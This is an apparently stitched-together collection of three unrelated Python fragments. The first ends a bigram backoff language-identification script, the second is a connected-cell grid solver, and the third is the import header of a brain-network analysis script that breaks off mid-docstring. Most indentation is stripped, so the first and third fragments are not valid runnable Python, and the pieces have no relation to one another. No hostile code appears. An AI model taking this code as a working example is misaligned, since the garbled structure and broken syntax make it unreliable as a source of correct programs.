#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang5')
countDevLang5+=1
#print("Done with %d sentences in dev set for Lang 5\n"%(countDevLang5))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev5.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev6):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang6')
countDevLang6+=1
#print("Done with %d sentences in dev set for Lang 6\n"%(countDevLang6))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev6.close()
#for debugging
#countRight = 0
#countWrong = 0
##for debugging
#for i in range(1,len(predictedLang)):
# if(predictedLang[i] == actualLang[i]):
# countRight+=1
# else:
# countWrong+=1
#
#print("count right is: ",countRight)
#print("count wrong is: ",countWrong)
#print("length of the two sets is")
#print(len(predictedLang))
#print(len(actualLang))
#print("\n")
print("Now calculating precision recall and f1 scores\n")
#calculate precision and recall using scikit python module
precision = precision_score(actualLang, predictedLang,average = "macro")
recall = recall_score(actualLang, predictedLang,average = "macro")
print(
"\nTotal number of sentences in dev set 1 is %d, in dev set 2 is %d"
", in dev set 3 is %d, in dev set 4 is %d, in dev set 5 is %d, and in dev set 6 is %d."
%(countDevLang1,countDevLang2,countDevLang3,countDevLang4,countDevLang5,countDevLang6)
)
print("\nPrecision is:")
print(precision)
print("Recall is:")
print(recall)
f1Score = (2*precision*recall)/(precision+recall)
print("F1Score is:")
print(f1Score)
#check if correct number of arguments.
#The script needs at least 12 CLI paths (argv[1..12]); the 13th and 14th are optional.
#BUG FIX: the second branch originally tested `len(sys.argv) == 15`, which is
#unreachable because the first branch already handles `>= 15`; given the three
#call arities (14, 13, 12 arguments) the intended test is `== 14`.
if (len(sys.argv) < 13):
    print("Incorrect number of arguments for the script")
else:
    if len(sys.argv) >= 15:
        #14 file arguments supplied
        bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7],
                      sys.argv[8], sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12], sys.argv[13], sys.argv[14])
    elif len(sys.argv) == 14:
        #13 file arguments supplied
        bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7],
                      sys.argv[8], sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12], sys.argv[13])
    else:
        #exactly 12 file arguments supplied
        bigramLaplace(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7],
                      sys.argv[8], sys.argv[9], sys.argv[10], sys.argv[11], sys.argv[12])
import sys
def visit(matrix, marked, i, j, marked_by, count):
#print('visiting '+str((i, j))+' count:'+str(count))
if marked[i][j][0] is True:
return count
else:
marked[i][j] = (True, marked_by)
count += 1
for x in [i-1, i, i+1]:
for y in [j-1, j, j+1]:
if 0 <= x < len(matrix) and 0 <= y < len(matrix[0]) and not (x == i and y == j):
if matrix[x][y] == 1:
count = visit(matrix, marked, x, y, marked_by, count)
return count
def connectedCell(matrix):
    """Return the size of the largest 8-connected region of 1-cells.

    matrix: rectangular list of lists containing 0/1 ints.

    Fixes two defects of the original:
    - ``max(all_counts)`` raised ``ValueError`` when the grid contained no
      1-cells; an empty grid or all-zero grid now returns 0.
    - the recursive helper could hit Python's recursion limit on large
      regions; this version flood-fills with an explicit stack.
    """
    if not matrix or not matrix[0]:
        return 0
    rows, cols = len(matrix), len(matrix[0])
    seen = [[False] * cols for _ in range(rows)]
    best = 0
    for si in range(rows):
        for sj in range(cols):
            if matrix[si][sj] != 1 or seen[si][sj]:
                continue
            # iterative flood fill over the 8 neighbours of each cell
            stack = [(si, sj)]
            seen[si][sj] = True
            size = 0
            while stack:
                i, j = stack.pop()
                size += 1
                for x in (i - 1, i, i + 1):
                    for y in (j - 1, j, j + 1):
                        if 0 <= x < rows and 0 <= y < cols and not seen[x][y] and matrix[x][y] == 1:
                            seen[x][y] = True
                            stack.append((x, y))
            best = max(best, size)
    return best
if __name__ == "__main__":
    # Read grid dimensions from stdin; the column count m is consumed to
    # advance the input stream but each row's width comes from the split.
    n = int(input().strip())
    m = int(input().strip())
    matrix = []
    for _ in range(n):
        row = [int(tok) for tok in input().strip().split(' ')]
        matrix.append(row)
    # Report the size of the largest connected region.
    print(connectedCell(matrix))
#!/home/despoB/mb3152/anaconda2/bin/python
import brain_graphs
import pandas as pd
import matlab
import matlab.engine
import os
import sys
import time
import numpy as np
import subprocess
import pickle
import h5py
import random
import time
import scipy
from scipy.io import loadmat
import scipy.io as sio
from scipy.stats.stats import pearsonr
import nibabel as nib
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neural_network import MLPRegressor
from itertools import combinations, permutations
from igraph import Graph, ADJ_UNDIRECTED, VertexClustering
import glob
import math
import matplotlib.patches as patches
from collections import Counter
import matplotlib.pylab as plt
import matplotlib as mpl
from matplotlib import patches
plt.rcParams['pdf.fonttype'] = 42
path = '/home/despoB/mb3152/anaconda2/lib/python2.7/site-packages/matplotlib/mpl-data/fonts/ttf/Helvetica.ttf'
prop = mpl.font_manager.FontProperties(fname=path)
mpl.rcParams['font.family'] = prop.get_name()
import seaborn as sns
import powerlaw
from richclub import preserve_strength, RC
from multiprocessing import Pool
sys.path.append('/home/despoB/mb3152/dynamic_mod/')
from sklearn import linear_model, metrics
import random
global hcp_subjects
hcp_subjects = os.listdir('/home/despoB/connectome-data/')
hcp_subjects.sort()
# global pc_vals
# global fit_matrices
# global task_perf
import statsmodels.api as sm
from statsmodels.stats.mediation import Mediation
from scipy import stats, linalg
global homedir
# homedir = '/Users/Maxwell/HWNI/'
homedir = '/home/despoB/mb3152/'
import multiprocessing
from sklearn.decomposition import PCA,FastICA,FactorAnalysis
from sklearn.cross_decomposition import CCA
import copy
from quantities import millimeter
def mm_2_inches(mm):
    """Convert a length from millimetres to inches via the quantities package."""
    length = mm * millimeter
    length.units = 'inches'
    return length.item()
def alg_compare_multi(matrix):
    """Compare community-detection algorithms on one connectivity matrix.

